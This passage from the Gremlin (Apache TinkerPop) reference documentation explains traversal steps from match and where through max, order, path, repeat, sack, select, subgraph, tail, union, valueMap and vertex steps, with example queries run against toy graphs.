combination.\n<8> The bound values are of different types -- vertex (\"a\"), vertex (\"b\"), long (\"c\").\n\n[[using-where-with-match]]\nUsing Where with Match\n^^^^^^^^^^^^^^^^^^^^^^\n\nMatch is typically used in conjunction with both `select()` (demonstrated previously) and `where()` (presented here). A `where()`-step allows the user to further constrain the result set provided by `match()`.\n\n[gremlin-groovy,modern]\n----\ng.V().match(\n __.as('a').out('created').as('b'),\n __.as('b').in('created').as('c')).\n where('a', neq('c')).\n select('a','c').by('name')\n----\n\nThe `where()`-step can take either a `P`-predicate (example above) or a `Traversal` (example below). Using `MatchPredicateStrategy`, `where()`-clauses are automatically folded into `match()` and thus, subject to the query optimizer within `match()`-step.\n\n[gremlin-groovy,modern]\n----\ntraversal = g.V().match(\n __.as('a').has(label,'person'), <1>\n __.as('a').out('created').as('b'),\n __.as('b').in('created').as('c')).\n where(__.as('a').out('knows').as('c')). 
<2>\n select('a','c').by('name'); null <3>\ntraversal.toString() <4>\ntraversal <5> <6>\ntraversal.toString() <7>\n----\n\n<1> Any `has()`-step traversal patterns that start with the match-key are pulled out of `match()` to enable the vendor to leverage the filter for index lookups.\n<2> A `where()`-step with a traversal containing variable bindings declared in `match()`.\n<3> A useful trick to ensure that the traversal is not iterated by Gremlin Console.\n<4> The string representation of the traversal prior to its strategies being applied.\n<5> The Gremlin Console will automatically iterate anything that is an iterator or is iterable.\n<6> Both marko and josh are co-developers and marko knows josh.\n<7> The string representation of the traversal after the strategies have been applied (and thus, `where()` is folded into `match()`)\n\nIMPORTANT: A `where()`-step is a filter and thus, variables within a `where()` clause are not globally bound to the path of the traverser in `match()`. As such, `where()`-steps in `match()` are used for filtering, not binding.\n\n[[max-step]]\nMax Step\n~~~~~~~~\n\nThe `max()`-step (*map*) operates on a stream of numbers and determines which is the largest number in the stream.\n\n[gremlin-groovy,modern]\n----\ng.V().values('age').max()\ng.V().repeat(both()).times(3).values('age').max()\n----\n\nIMPORTANT: `max(local)` determines the max of the current, local object (not the objects in the traversal stream). This works for `Collection` and `Number`-type objects. For any other object, a max of `Double.NaN` is returned.\n\n[[mean-step]]\nMean Step\n~~~~~~~~~\n\nThe `mean()`-step (*map*) operates on a stream of numbers and determines the average of those numbers.\n\n[gremlin-groovy,modern]\n----\ng.V().values('age').mean()\ng.V().repeat(both()).times(3).values('age').mean() <1>\ng.V().repeat(both()).times(3).values('age').dedup().mean()\n----\n\n<1> Realize that traversers are being bulked by `repeat()`. There may be more of a particular number than another, thus altering the average.\n\nIMPORTANT: `mean(local)` determines the mean of the current, local object (not the objects in the traversal stream). This works for `Collection` and `Number`-type objects. For any other object, a mean of `Double.NaN` is returned.\n\n[[min-step]]\nMin Step\n~~~~~~~~\n\nThe `min()`-step (*map*) operates on a stream of numbers and determines which is the smallest number in the stream.\n\n[gremlin-groovy,modern]\n----\ng.V().values('age').min()\ng.V().repeat(both()).times(3).values('age').min()\n----\n\nIMPORTANT: `min(local)` determines the min of the current, local object (not the objects in the traversal stream). This works for `Collection` and `Number`-type objects. For any other object, a min of `Double.NaN` is returned.\n\n[[or-step]]\nOr Step\n~~~~~~~\n\nThe `or()`-step ensures that at least one of the provided traversals yield a result (*filter*). Please see <<and-step,`and()`>> for and-semantics.\n\n[gremlin-groovy,modern]\n----\ng.V().or(\n __.outE('created'),\n __.inE('created').count().is(gt(1))).\n values('name')\n----\n\nThe `or()`-step can take an arbitrary number of traversals. At least one of the traversals must produce at least one output for the original traverser to pass to the next step.\n\nAn link:http:\/\/en.wikipedia.org\/wiki\/Infix_notation[infix notation] can be used as well. 
Though, with infix notation, only two traversals can be or'd together.

[gremlin-groovy,modern]
----
g.V().where(outE('created').or().outE('knows')).values('name')
----

[[order-step]]
Order Step
~~~~~~~~~~

When the objects of the traversal stream need to be sorted, `order()`-step (*map*) can be leveraged.

[gremlin-groovy,modern]
----
g.V().values('name').order()
g.V().values('name').order().by(decr)
g.V().hasLabel('person').order().by('age', incr).values('name')
----

One of the most traversed objects in a traversal is an `Element`. An element can have properties associated with it (i.e. key/value pairs). In many situations, it is desirable to sort an element traversal stream according to a comparison of its properties.

[gremlin-groovy,modern]
----
g.V().values('name')
g.V().order().by('name',incr).values('name')
g.V().order().by('name',decr).values('name')
----

The `order()`-step allows the user to provide an arbitrary number of comparators for primary, secondary, etc. sorting. In the example below, the primary ordering is based on the outgoing created-edge count. The secondary ordering is based on the age of the person.

[gremlin-groovy,modern]
----
g.V().hasLabel('person').order().by(outE('created').count(), incr).
 by('age', incr).values('name')
g.V().hasLabel('person').order().by(outE('created').count(), incr).
 by('age', decr).values('name')
----

Randomizing the order of the traversers at a particular point in the traversal is possible with `Order.shuffle`.

[gremlin-groovy,modern]
----
g.V().hasLabel('person').order().by(shuffle)
g.V().hasLabel('person').order().by(shuffle)
----

IMPORTANT: `order(local)` orders the current, local object (not the objects in the traversal stream). This works for `Collection`- and `Map`-type objects. For any other object, the object is returned unchanged.
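A quick sketch of the `local` form, where `fold()` is used only to manufacture a single `Collection`-carrying traverser (assuming the modern toy graph):

[gremlin-groovy,modern]
----
g.V().values('name').fold() // one traverser carrying a List of names
g.V().values('name').fold().order(local) // the list itself is sorted alphabetically
----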
[[path-step]]
Path Step
~~~~~~~~~

A traverser is transformed as it moves through a series of steps within a traversal. The history of the traverser is realized by examining its path with `path()`-step (*map*).

image::path-step.png[width=650]

[gremlin-groovy,modern]
----
g.V().out().out().values('name')
g.V().out().out().values('name').path()
----

If edges are required in the path, then be sure to traverse those edges explicitly.

[gremlin-groovy,modern]
----
g.V().outE().inV().outE().inV().path()
----

It is possible to post-process the elements of the path in a round-robin fashion via `by()`.

[gremlin-groovy,modern]
----
g.V().out().out().path().by('name').by('age')
----

Finally, because of `by()`-based post-processing, nothing prevents triggering yet another traversal. In the traversal below, for each element of the path traversed thus far, if it's a person (as determined by having an `age`-property), then get all of their creations, else if it's a creation, get all the people that created it.

[gremlin-groovy,modern]
----
g.V().out().out().path().by(
 choose(hasLabel('person'),
 out('created').values('name'),
 __.in('created').values('name')).fold())
----

WARNING: Generating path information is expensive as the history of the traverser is stored into a Java list. With numerous traversers, there are numerous lists. Moreover, in an OLAP <<graphcomputer,`GraphComputer`>> environment this becomes exceedingly prohibitive as there are traversers emanating from all vertices in the graph in parallel. In OLAP there are optimizations provided for traverser populations, but when paths are calculated (and each traverser is unique due to its history), then these optimizations are no longer possible.

[[path-data-structure]]
Path Data Structure
^^^^^^^^^^^^^^^^^^^

The `Path` data structure is an ordered list of objects, where each object is associated to a `Set<String>` of labels. An example is presented below to demonstrate both the `Path` API as well as how a traversal yields labeled paths.

image::path-data-structure.png[width=350]

[gremlin-groovy,modern]
----
path = g.V(1).as('a').has('name').as('b').
 out('knows').out('created').as('c').
 has('name','ripple').values('name').as('d').
 identity().as('e').path().next()
path.size()
path.objects()
path.labels()
path.a
path.b
path.c
path.d == path.e
----

[[profile-step]]
Profile Step
~~~~~~~~~~~~

The `profile()`-step (*sideEffect*) exists to allow developers to profile their traversals to determine statistical information like step runtime, counts, etc.

WARNING: Profiling a Traversal will impede the Traversal's performance. This overhead is mostly excluded from the profile results, but durations are not exact. Thus, durations are best considered in relation to each other.

[gremlin-groovy,modern]
----
g.V().out('created').repeat(both()).times(3).hasLabel('person').values('age').sum().profile().cap(TraversalMetrics.METRICS_KEY)
----

The `profile()`-step generates a `TraversalMetrics` sideEffect object that contains the following information:

* `Step`: A step within the traversal being profiled.
* `Count`: The number of _represented_ traversers that passed through the step.
* `Traversers`: The number of traversers that passed through the step.
* `Time (ms)`: The total time the step was actively executing its behavior.
* `% Dur`: The percentage of total time spent in the step.

image:gremlin-exercise.png[width=120,float=left] It is important to understand the difference between `Count` and `Traversers`. Traversers can be merged and as such, when two traversers are "the same" they may be aggregated into a single traverser. That new traverser has a `Traverser.bulk()` that is the sum of the two merged traverser bulks. On the other hand, the `Count` represents the sum of all `Traverser.bulk()` results and thus, expresses the number of "represented" (not enumerated) traversers. `Traversers` will always be less than or equal to `Count`.

[[range-step]]
Range Step
~~~~~~~~~~

As traversers propagate through the traversal, it is possible to only allow a certain number of them to pass through with `range()`-step (*filter*). When the low-end of the range is not met, objects continue to be iterated. When within the low (inclusive) and high (exclusive) range, traversers are emitted. Finally, when at or above the high range, the traversal breaks out of iteration.

[gremlin-groovy,modern]
----
g.V().range(0,3)
g.V().range(1,3)
g.V().repeat(both()).times(1000000).emit().range(6,10)
----

The `range()`-step can also be applied with `Scope.local`, in which case it operates on the incoming collection. For example, it is possible to produce a `Map<String, String>` for each traversed path, but containing only the second property value (the "b" step).

[gremlin-groovy,modern]
----
g.V().as('a').out().as('b').in().as('c').select('a','b','c').by('name').range(local,1,2)
----

The next example uses the <<the-crew-toy-graph,The Crew>> toy data set.
It produces a `List<String>` containing the second and third location for each vertex.\n\n[gremlin-groovy,theCrew]\n----\ng.V().valueMap().select('location').range(local, 1, 3)\n----\n\n[[repeat-step]]\nRepeat Step\n~~~~~~~~~~~\n\nimage::gremlin-fade.png[width=350]\n\nThe `repeat()`-step (*branch*) is used for looping over a traversal given some break predicate. Below are some examples of `repeat()`-step in action.\n\n[gremlin-groovy,modern]\n----\ng.V(1).repeat(out()).times(2).path().by('name') <1>\ng.V().until(has('name','ripple')).\n repeat(out()).path().by('name') <2>\n----\n\n<1> do-while semantics stating to do `out()` 2 times.\n<2> while-do semantics stating to break if the traverser is at a vertex named \"ripple\".\n\nIMPORTANT: There are two modulators for `repeat()`: `until()` and `emit()`. If `until()` comes after `repeat()` it is do\/while looping. If `until()` comes before `repeat()` it is while\/do looping. If `emit()` is placed after `repeat()`, it is evaluated on the traversers leaving the repeat-traversal. If `emit()` is placed before `repeat()`, it is evaluated on the traversers prior to entering the repeat-traversal.\n\nThe `repeat()`-step also supports an \"emit predicate\", where the predicate for an empty argument `emit()` is true (i.e. `emit() == emit{true}`). With `emit()`, the traverser is split in two -- the traverser exits the code block as well as continues back within the code block (assuming `until()` holds true).\n\n[gremlin-groovy,modern]\n----\ng.V(1).repeat(out()).times(2).emit().path().by('name') <1>\ng.V(1).emit().repeat(out()).times(2).path().by('name') <2>\n----\n\n<1> The `emit()` comes after `repeat()` and thus, emission happens after the `repeat()` traversal is executed. Thus, no one vertex paths exist.\n<2> The `emit()` comes before `repeat()` and thus, emission happens prior to the `repeat()` traversal being executed. Thus, one vertex paths exist.\n\nThe `emit()`-modulator can take an arbitrary predicate.\n\n[gremlin-groovy,modern]\n----\ng.V(1).repeat(out()).times(2).emit(has('lang')).path().by('name')\n----\n\nimage::repeat-step.png[width=500]\n\n[gremlin-groovy,modern]\n----\ng.V(1).repeat(out()).times(2).emit().path().by('name')\n----\n\nThe first time through the `repeat()`, the vertices lop, vadas, and josh are seen. Given that `loops==0`, the traverser repeats. However, because the emit-predicate is declared true, those vertices are emitted. At step 2 (`loops==1`), the vertices traversed are ripple and lop (Josh's created projects, as lop and vadas have no out edges) and are also emitted. Now `loops==1` so the traverser repeats. As ripple and lop have no out edges there are no vertices to traverse. Given that `loops==2`, the until-predicate fails. Therefore, the traverser has seen the vertices: lop, vadas, josh, ripple, and lop.\n\nFinally, note that both `emit()` and `until()` can take a traversal and in such, situations, the predicate is determined by `traversal.hasNext()`. 
A few examples are provided below.

[gremlin-groovy,modern]
----
g.V(1).repeat(out()).until(hasLabel('software')).path().by('name') <1>
g.V(1).emit(hasLabel('person')).repeat(out()).path().by('name') <2>
g.V(1).repeat(out()).until(outE().count().is(0)).path().by('name') <3>
----

<1> Starting from vertex 1, keep taking outgoing edges until a software vertex is reached.
<2> Starting from vertex 1, and in an infinite loop, emit the vertex if it is a person and then traverse the outgoing edges.
<3> Starting from vertex 1, keep taking outgoing edges until a vertex is reached that has no more outgoing edges.

WARNING: The anonymous traversals of `emit()` and `until()` (not `repeat()`) process their current objects "locally." In OLAP, where the atomic unit of computing is the vertex and its local "star graph," it is important that the anonymous traversals do not leave the confines of the vertex's star graph. In other words, they cannot traverse to an adjacent vertex's properties or edges.

[[sack-step]]
Sack Step
~~~~~~~~~

image:gremlin-sacks-running.png[width=175,float=right] A traverser can contain a local data structure called a "sack". The `sack()`-step is used to read and write sacks (*sideEffect* or *map*). Each sack of each traverser is created when using `GraphTraversal.withSack(initialValueSupplier,splitOperator?)`.

* *Initial value supplier*: A `Supplier` providing the initial value of each traverser's sack.
* *Split operator*: a `UnaryOperator` that clones the traverser's sack when the traverser splits. If no split operator is provided, then `UnaryOperator.identity()` is assumed.

Two trivial examples are presented below to demonstrate the *initial value supplier*. In the first example below, a traverser is created at each vertex in the graph (`g.V()`), with a 1.0 sack (`withSack(1.0f)`), and then the sack value is accessed (`sack()`). In the second example, a random float supplier is used to generate sack values.

[gremlin-groovy,modern]
----
g.withSack(1.0f).V().sack()
rand = new Random()
g.withSack {rand.nextFloat()}.V().sack()
----

A more complicated initial value supplier example is presented below where the sack values are used in a running computation and then emitted at the end of the traversal. When an edge is traversed, the edge weight is multiplied by the sack value (`sack(mult).by('weight')`). Note that the <<by-step,`by()`>>-modulator can be any arbitrary traversal.

[gremlin-groovy,modern]
----
g.withSack(1.0f).V().repeat(outE().sack(mult).by('weight').inV()).times(2)
g.withSack(1.0f).V().repeat(outE().sack(mult).by('weight').inV()).times(2).sack()
g.withSack(1.0f).V().repeat(outE().sack(mult).by('weight').inV()).times(2).path().
 by().by('weight')
----

image:gremlin-sacks-standing.png[width=100,float=left] When complex objects are used (i.e. non-primitives), then a *split operator* should be defined to ensure that each traverser gets a clone of its parent's sack. The first example does not use a split operator and as such, the same map is propagated to all traversers (a global data structure).
The second example, demonstrates how `Map.clone()` ensures that each traverser's sack contains a unique, local sack.\n\n[gremlin-groovy,modern]\n----\ng.withSack {[:]}.V().out().out().\n sack {m,v -> m[v.value('name')] = v.value('lang'); m}.sack() \/\/ BAD: single map\ng.withSack {[:]}{it.clone()}.V().out().out().\n sack {m,v -> m[v.value('name')] = v.value('lang'); m}.sack() \/\/ GOOD: cloned map\n----\n\nNOTE: For primitives (i.e. integers, longs, floats, etc.), a split operator is not required as a primitives are encoded in the memory address of the sack, not as a reference to an object.\n\n[[sample-step]]\nSample Step\n~~~~~~~~~~~\n\nThe `sample()`-step is useful for sampling some number of traversers previous in the traversal.\n\n[gremlin-groovy,modern]\n----\ng.V().outE().sample(1).values('weight')\ng.V().outE().sample(1).by('weight').values('weight')\ng.V().outE().sample(2).by('weight').values('weight')\n----\n\nOne of the more interesting use cases for `sample()` is when it is used in conjunction with <<local-step,`local()`>>. The combination of the two steps supports the execution of link:http:\/\/en.wikipedia.org\/wiki\/Random_walk[random walks]. In the example below, the traversal starts are vertex 1 and selects one edge to traverse based on a probability distribution generated by the weights of the edges. The output is always a single path as by selecting a single edge, the traverser never splits and continues down a single path in the graph.\n\n[gremlin-groovy,modern]\n----\ng.V(1).repeat(local(\n bothE().sample(1).by('weight').otherV()\n )).times(5)\ng.V(1).repeat(local(\n bothE().sample(1).by('weight').otherV()\n )).times(5).path()\ng.V(1).repeat(local(\n bothE().sample(1).by('weight').otherV()\n )).times(10).path()\n----\n\n[[select-step]]\nSelect Step\n~~~~~~~~~~~\n\nlink:http:\/\/en.wikipedia.org\/wiki\/Functional_programming[Functional languages] make use of function composition and lazy evaluation to create complex computations from primitive operations. This is exactly what `Traversal` does. One of the differentiating aspects of Gremlin's data flow approach to graph processing is that the flow need not always go \"forward,\" but in fact, can go back to a previously seen area of computation. Examples include <<path-step,`path()`>> as well as the `select()`-step (*map*). There are two general ways to use `select()`-step.\n\n. Select labeled steps within a path (as defined by `as()` in a traversal).\n. Select objects out of a `Map<String,Object>` flow (i.e. a sub-map).\n\nThe first use case is demonstrated via example below.\n\n[gremlin-groovy,modern]\n----\ng.V().as('a').out().as('b').out().as('c') \/\/ no select\ng.V().as('a').out().as('b').out().as('c').select('a','b','c')\ng.V().as('a').out().as('b').out().as('c').select('a','b')\ng.V().as('a').out().as('b').out().as('c').select('a','b').by('name')\ng.V().as('a').out().as('b').out().as('c').select('a') <1>\n----\n\n<1> If the selection is one step, no map is returned.\n\nWhen there is only one label selected, then a single object is returned. This is useful for stepping back in a computation and easily moving forward again on the object reverted to.\n\n[gremlin-groovy,modern]\n----\ng.V().out().out()\ng.V().out().out().path()\ng.V().as('x').out().out().select('x')\ng.V().out().as('x').out().select('x')\ng.V().out().out().as('x').select('x') \/\/ pointless\n----\n\nNOTE: When executing a traversal with `select()` on a standard traversal engine (i.e. 
OLTP), `select()` will do its best to avoid calculating the path history and instead, will rely on a global data structure for storing the currently selected object. As such, if only a subset of the path walked is required, `select()` should be used over the more resource intensive <<path-step,`path()`>>-step.\n\n[[using-where-with-select]]\nUsing Where with Select\n^^^^^^^^^^^^^^^^^^^^^^^\n\nFinally, like <<match-step,`match()`>>-step, it is possible to use `where()`, as where is a filter that processes `Map<String,Object>` streams.\n\n[gremlin-groovy,modern]\n----\ng.V().as('a').out('created').in('created').as('b').select('a','b').by('name') <1>\ng.V().as('a').out('created').in('created').as('b').\n select('a','b').by('name').where('a',neq('b')) <2>\ng.V().as('a').out('created').in('created').as('b').\n select('a','b'). <3>\n where('a',neq('b')).\n where(__.as('a').out('knows').as('b')).\n select('a','b').by('name')\n----\n\n<1> A standard `select()` that generates a `Map<String,Object>` of variables bindings in the path (i.e. `a` and `b`) for the sake of a running example.\n<2> The `select().by('name')` projects each binding vertex to their name property value and `where()` operates to ensure respective `a` and `b` strings are not the same.\n<3> The first `select()` projects a vertex binding set. A binding is filtered if `a` vertex equals `b` vertex. A binding is filtered if `a` doesn't know `b`. The second and final `select()` projects the name of the vertices.\n\n[[simplepath-step]]\nSimplePath Step\n~~~~~~~~~~~~~~~\n\nimage::simplepath-step.png[width=400]\n\nWhen it is important that a traverser not repeat its path through the graph, `simplePath()`-step should be used (*filter*). The <<path-data-structure,path>> information of the traverser is analyzed and if the path has repeated objects in it, the traverser is filtered. If cyclic behavior is desired, see <<cyclicpath-step,`cyclicPath()`>>.\n\n[gremlin-groovy,modern]\n----\ng.V(1).both().both()\ng.V(1).both().both().simplePath()\ng.V(1).both().both().simplePath().path()\n----\n\n[[store-step]]\nStore Step\n~~~~~~~~~~\n\nWhen link:http:\/\/en.wikipedia.org\/wiki\/Lazy_evaluation[lazy] aggregation is needed, `store()`-step (*sideEffect*) should be used over <<aggregate-step,`aggregate()`>>. The two steps differ in that `store()` does not block and only stores objects in its side-effect collection as they pass through.\n\n[gremlin-groovy,modern]\n----\ng.V().aggregate('x').limit(1).cap('x')\ng.V().store('x').limit(1).cap('x')\n----\n\nIt is interesting to note that there are three results in the `store()` side-effect even though the interval selection is for 2 objects. Realize that when the third object is on its way to the `range()` filter (i.e. `[0..1]`), it passes through `store()` and thus, stored before filtered.\n\n[gremlin-groovy,modern]\n----\ng.E().store('x').by('weight').cap('x')\n----\n\n[[subgraph-step]]\nSubgraph Step\n~~~~~~~~~~~~~\n\nimage::subgraph-logo.png[width=380]\n\nExtracting a portion of a graph from a larger one for analysis, visualization or other purposes is a fairly common use case for graph analysts and developers. The `subgraph()`-step (*sideEffect*) provides a way to produce an link:http:\/\/mathworld.wolfram.com\/Edge-InducedSubgraph.html[edge-induced subgraph] from virtually any traversal. 
The following example demonstrates how to produce the "knows" subgraph:

[gremlin-groovy,modern]
----
subGraph = g.E().hasLabel('knows').subgraph('subGraph').cap('subGraph').next() <1>
sg = subGraph.traversal(standard())
sg.E() <2>
----

<1> As this function produces "edge-induced" subgraphs, `subgraph()` must be called at edge steps.
<2> The subgraph contains only "knows" edges.

A more common subgraphing use case is to get all of the graph structure surrounding a single vertex:

[gremlin-groovy,modern]
----
subGraph = g.V(3).repeat(__.inE().subgraph('subGraph').outV()).times(3).cap('subGraph').next() <1>
sg = subGraph.traversal(standard())
sg.E()
----

<1> Starting at vertex `3`, traverse 3 steps away on in-edges, outputting all of that into the subgraph.

There can be multiple `subgraph()` calls within the same traversal, each operating against either the same graph (i.e. same side-effect key) or different graphs (i.e. different side-effect keys).

[gremlin-groovy,modern]
----
t = g.V().outE('knows').subgraph('knowsG').inV().outE('created').subgraph('createdG').
 inV().inE('created').subgraph('createdG').iterate()
t.sideEffects.get('knowsG').get().traversal(standard()).E()
t.sideEffects.get('createdG').get().traversal(standard()).E()
----

IMPORTANT: The `subgraph()`-step only writes to graphs that support user-supplied ids for its elements. Moreover, if no graph is specified via `withSideEffect()`, then <<tinkergraph-gremlin,TinkerGraph>> is assumed.

[[sum-step]]
Sum Step
~~~~~~~~

The `sum()`-step (*map*) operates on a stream of numbers and sums the numbers together to yield a double. Note that the current traverser number is multiplied by the traverser bulk to determine how many such numbers are being represented.

[gremlin-groovy,modern]
----
g.V().values('age').sum()
g.V().repeat(both()).times(3).values('age').sum()
----

IMPORTANT: `sum(local)` determines the sum of the current, local object (not the objects in the traversal stream). This works for `Collection`-type objects. For any other object, a sum of `Double.NaN` is returned.
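A minimal sketch of the `local` form, where `fold()` first reduces the stream to a single `Collection` (the arithmetic assumes the modern toy graph):

[gremlin-groovy,modern]
----
g.V().values('age').fold() // a single traverser carrying a List of ages
g.V().values('age').fold().sum(local) // 29 + 27 + 32 + 35 = 123
----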
[[tail-step]]
Tail Step
~~~~~~~~~

image::tail-step.png[width=530]

The `tail()`-step is analogous to <<limit-step,`limit()`>>-step, except that it emits the last `n`-objects instead of the first `n`-objects.

[gremlin-groovy,modern]
----
g.V().values('name').order()
g.V().values('name').order().tail() <1>
g.V().values('name').order().tail(1) <2>
g.V().values('name').order().tail(3) <3>
----

<1> Last name (alphabetically).
<2> Same as statement 1.
<3> Last three names.

The `tail()`-step can also be applied with `Scope.local`, in which case it operates on the incoming collection.

[gremlin-groovy,modern]
----
g.V().as('a').out().as('a').out().as('a').select('a').by(tail(local)).values('name') <1>
g.V().as('a').out().as('a').out().as('a').select('a').by(unfold().values('name').fold()).tail(local) <2>
g.V().as('a').out().as('a').out().as('a').select('a').by(unfold().values('name').fold()).tail(local, 2) <3>
g.V().valueMap().tail(local) <4>
----

<1> Only the most recent name from the "a" step (`List<Vertex>` becomes `Vertex`).
<2> Same result as statement 1 (`List<String>` becomes `String`).
<3> `List<String>` for each path containing the last two names from the 'a' step.
<4> `Map<String, Object>` for each vertex, but containing only the last property value.

[[timelimit-step]]
TimeLimit Step
~~~~~~~~~~~~~~

In many situations, a graph traversal is not about getting an exact answer as it's about getting a relative ranking. A classic example is link:http://en.wikipedia.org/wiki/Recommender_system[recommendation]. What is desired is a relative ranking of vertices, not their absolute rank. Next, it may be desirable to have the traversal execute for no more than 2 milliseconds. In such situations, `timeLimit()`-step (*filter*) can be used.

image::timelimit-step.png[width=400]

NOTE: The method `clock(int runs, Closure code)` is a utility preloaded in the <<gremlin-console,Gremlin Console>> that can be used to time execution of a body of code.

[gremlin-groovy,modern]
----
g.V().repeat(both().groupCount('m')).times(16).cap('m').order(local).by(valueDecr).next()
clock(1) {g.V().repeat(both().groupCount('m')).times(16).cap('m').order(local).by(valueDecr).next()}
g.V().repeat(timeLimit(2).both().groupCount('m')).times(16).cap('m').order(local).by(valueDecr).next()
clock(1) {g.V().repeat(timeLimit(2).both().groupCount('m')).times(16).cap('m').order(local).by(valueDecr).next()}
----

In essence, the relative order is respected, even though the number of traversers at each vertex is not. The primary benefit is that the calculation is guaranteed to complete at the specified time limit (in milliseconds). Finally, note that the internal clock of `timeLimit()`-step starts when the first traverser enters it. When the time limit is reached, any `next()` evaluation of the step will yield a `NoSuchElementException` and any `hasNext()` evaluation will yield `false`.

[[tree-step]]
Tree Step
~~~~~~~~~

From any one element (i.e. vertex or edge), the emanating paths from that element can be aggregated to form a link:http://en.wikipedia.org/wiki/Tree_(data_structure)[tree].
Gremlin provides `tree()`-step (*sideEffect*) for such situations.

image::tree-step.png[width=450]

[gremlin-groovy,modern]
----
tree = g.V().out().out().tree().next()
----

It is important to see how the paths of all the emanating traversers are united to form the tree.

image::tree-step2.png[width=500]

The resultant tree data structure can then be manipulated (see `Tree` JavaDoc).

[gremlin-groovy,modern]
----
tree = g.V().out().out().tree().by('name').next()
tree['marko']
tree['marko']['josh']
tree.getObjectsAtDepth(3)
----

[[unfold-step]]
Unfold Step
~~~~~~~~~~~

If the object reaching `unfold()` (*flatMap*) is an iterator, iterable, or map, then it is unrolled into a linear form. If not, then the object is simply emitted. Please see <<fold-step,`fold()`>>-step for the inverse behavior.

[gremlin-groovy,modern]
----
g.V(1).out().fold().inject('gremlin',[1.23,2.34])
g.V(1).out().fold().inject('gremlin',[1.23,2.34]).unfold()
----

Note that `unfold()` does not recursively unroll iterators. Instead, `repeat()` can be used for recursive unrolling.

[gremlin-groovy,modern]
----
inject(1,[2,3,[4,5,[6]]])
inject(1,[2,3,[4,5,[6]]]).unfold()
inject(1,[2,3,[4,5,[6]]]).repeat(unfold()).until(count(local).is(1)).unfold()
----

[[union-step]]
Union Step
~~~~~~~~~~

image::union-step.png[width=650]

The `union()`-step (*branch*) supports the merging of the results of an arbitrary number of traversals. When a traverser reaches a `union()`-step, it is copied to each of its internal steps. The traversers emitted from `union()` are the outputs of the respective internal traversals.

[gremlin-groovy,modern]
----
g.V(4).union(
 __.in().values('age'),
 out().values('lang'))
g.V(4).union(
 __.in().values('age'),
 out().values('lang')).path()
----

[[valuemap-step]]
ValueMap Step
~~~~~~~~~~~~~

The `valueMap()`-step yields a Map representation of the properties of an element.

[gremlin-groovy,modern]
----
g.V().valueMap()
g.V().valueMap('age')
g.V().valueMap('age','blah')
g.E().valueMap()
----

It is important to note that the map of a vertex maintains a list of values for each key. The map of an edge or vertex-property represents a single property (not a list). The reason is that vertices in TinkerPop3 leverage <<vertex-properties,vertex properties>>, which support multiple values per key. Using the <<the-crew-toy-graph,"The Crew">> toy graph, the point is made explicit.

[gremlin-groovy,theCrew]
----
g.V().valueMap()
g.V().has('name','marko').properties('location')
g.V().has('name','marko').properties('location').valueMap()
----

If the `id`, `label`, `key`, and `value` of the `Element` are desired, then a boolean triggers their insertion into the returned map.

[gremlin-groovy,theCrew]
----
g.V().hasLabel('person').valueMap(true)
g.V().hasLabel('person').valueMap(true,'name')
g.V().hasLabel('person').properties('location').valueMap(true)
----

[[vertex-steps]]
Vertex Steps
~~~~~~~~~~~~

image::vertex-steps.png[width=350]

The vertex steps (*flatMap*) are fundamental to the Gremlin language. Via these steps, it's possible to "move" on the graph -- i.e. traverse.

* `out(string...)`: Move to the outgoing adjacent vertices given the edge labels.
* `in(string...)`: Move to the incoming adjacent vertices given the edge labels.
* `both(string...)`: Move to both the incoming and outgoing adjacent vertices given the edge labels.
* `outE(string...)`: Move to the outgoing incident edges given the edge labels.
* `inE(string...)`: Move to the incoming incident edges given the edge labels.
* `bothE(string...)`: Move to both the incoming and outgoing incident edges given the edge labels.
* `outV()`: Move to the outgoing vertex.
* `inV()`: Move to the incoming vertex.
* `bothV()`: Move to both vertices.
* `otherV()`: Move to the vertex that was not the vertex that was moved from.

[gremlin-groovy,modern]
----
g.V(4)
g.V(4).outE() <1>
g.V(4).inE('knows') <2>
g.V(4).inE('created') <3>
g.V(4).bothE('knows','created','blah')
g.V(4).bothE('knows','created','blah').otherV()
g.V(4).both('knows','created','blah')
g.V(4).outE().inV() <4>
g.V(4).out() <5>
g.V(4).inE().outV()
g.V(4).inE().bothV()
----

<1> All outgoing edges.
<2> All incoming knows-edges.
<3> All incoming created-edges.
<4> Moving forward touching edges and vertices.
<5> Moving forward only touching vertices.

[[where-step]]
Where Step
~~~~~~~~~~

The `where()`-step filters the current object based on either the object itself (`Scope.local`) or the path history of the object (`Scope.global`) (*filter*). This step is typically used in conjunction with either <<match-step,`match()`>>-step or <<select-step,`select()`>>-step, but can be used in isolation.

[gremlin-groovy,modern]
----
g.V(1).as('a').out('created').in('created').where(neq('a')) <1>
g.withSideEffect('a',['josh','peter']).V(1).out('created').in('created').values('name').where(within('a')) <2>
g.V(1).out('created').in('created').where(out('created').count().is(gt(1))).values('name') <3>
----

<1> Who are marko's collaborators, where marko cannot be his own collaborator? (predicate)
<2> Of the co-creators of marko, only keep those whose name is josh or peter. (using a sideEffect)
<3> Which of marko's collaborators have worked on more than 1 project? (using a traversal)

IMPORTANT: Please see <<using-where-with-match,`match().where()`>> and <<using-where-with-select,`select().where()`>> for how `where()` can be used in conjunction with `Map<String,Object>` projecting steps -- i.e. `Scope.local`.

A few more examples of filtering an arbitrary object based on an anonymous traversal are provided below.

[gremlin-groovy,modern]
----
g.V().where(out('created')).values('name') <1>
g.V().out('knows').where(out('created')).values('name') <2>
g.V().where(out('created').count().is(gte(2))).values('name') <3>
g.V().where(out('knows').where(out('created'))).values('name') <4>
g.V().where(__.not(out('created'))).where(__.in('knows')).values('name') <5>
g.V().where(__.not(out('created')).and().in('knows')).values('name') <6>
----

<1> What are the names of the people who have created a project?
<2> What are the names of the people that are known by someone and have created a project?
<3> What are the names of the people who have created two or more projects?
<4> What are the names of the people who know someone that has created a project? (This only works in OLTP -- see the `WARNING` below)
<5> What are the names of the people who have not created anything, but are known by someone?
<6> The concatenation of `where()`-steps is the same as a single `where()`-step with an and'd clause.

WARNING: The anonymous traversal of `where()` processes the current object "locally". In OLAP, where the atomic unit of computing is the vertex and its local "star graph," it is important that the anonymous traversal does not leave the confines of the vertex's star graph. In other words, it cannot traverse to an adjacent vertex's properties or edges.
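To round out the section with one more sketch (assuming the modern toy graph): because concatenated `where()`-steps are and'd together (callout 6 above), a predicate-based filter and a traversal-based filter can be chained within one traversal:

[gremlin-groovy,modern]
----
g.V(1).as('a').out('created').in('created').where(neq('a')).
 where(out('created').count().is(1)).values('name') // peter: the only co-creator of marko with exactly one project
----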

[[a-note-on-predicates]]
A Note on Predicates
--------------------

